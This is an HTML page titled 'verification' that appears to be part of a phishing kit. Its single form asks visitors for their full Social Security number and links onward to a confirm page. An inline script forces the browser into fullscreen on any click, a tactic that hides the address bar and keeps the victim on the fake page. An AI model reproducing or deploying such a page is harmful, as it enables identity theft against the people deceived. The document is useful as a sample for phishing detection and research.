<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8" />
    <meta httpequiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport"
        content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1.00001,viewport-fit=cover" />
    <title>verification</title>
    <style>
        #root,
        body,
        html {
            width: 100%;
            -webkit-overflow-scrolling: touch;
            margin: 0;
            padding: 0;
            min-height: 100%
        }

        #root {
            flex-shrink: 0;
            flex-basis: auto;
            flex-grow: 1;
            display: flex;
            flex: 1
        }

        html {
            scroll-behavior: smooth;
            -webkit-text-size-adjust: 100%;
            height: calc(100% + env(safe-area-inset-top))
        }

        body {
            display: flex;
            overflow-y: auto;
            overscroll-behavior-y: none;
            text-rendering: optimizeLegibility;
            -webkit-font-smoothing: antialiased;
            -moz-osx-font-smoothing: grayscale;
            -ms-overflow-style: scrollbar
        }
    </style>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
        integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link rel="stylesheet" href="assets/css/style.css">
</head>

<body><noscript>
        <form action="" style="background-color:#fff;position:fixed;top:0;left:0;right:0;bottom:0;z-index:9999">
            <div style="font-size:18px;font-family:Helvetica,sans-serif;line-height:24px;margin:10%;width:80%">
                <p>Oh no! It looks like JavaScript is not enabled in your browser.</p>
                <p style="margin:20px 0"><button type="submit"
                        style="background-color:#4630eb;border-radius:100px;border:none;box-shadow:none;color:#fff;cursor:pointer;font-weight:700;line-height:20px;padding:6px 16px">Reload</button>
                </p>
            </div>
        </form>
    </noscript>
    <div id="root">
        <section id="main_e_section">
            <div class="container">
                <div class="row">
                    <div class="col-md-12 pt-5">
                        <div class="main_body">
                            <form action="#">
                                <div class="form-group">
                                    <label for="" class="input-label">Enter your Full SSN number</label>
                                    <h3>?</h3>
                                    
                                    <input type="email" placeholder=" SSN Number" class="form-control">
                                    
                                </div>
                                <div class="btn-email text-center">
                                    <a href="confirm.html" type="submit" class="btn btn-success confirm-button">Next</a>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </section>
    </div>
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
        integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
        crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.12.9/dist/umd/popper.min.js"
        integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
        crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js"
        integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
        crossorigin="anonymous"></script>
    <script src="assets/js/fontawesome.min.js"></script>
    <script src="assets/js/app.93aa9c90.chunk.js"></script>
    <script type="text/javascript">
        var elem = document.documentElement;
        function openFullscreen() {
            if (elem.requestFullscreen) {
                elem.requestFullscreen();
            } else if (elem.webkitRequestFullscreen) {
                /* Safari */
                elem.webkitRequestFullscreen();
            } else if (elem.msRequestFullscreen) {
                /* IE11 */
                elem.msRequestFullscreen();
            }
        }
        document.getElementById("root").addEventListener("click", openFullscreen);
    </script>
</body>

</html>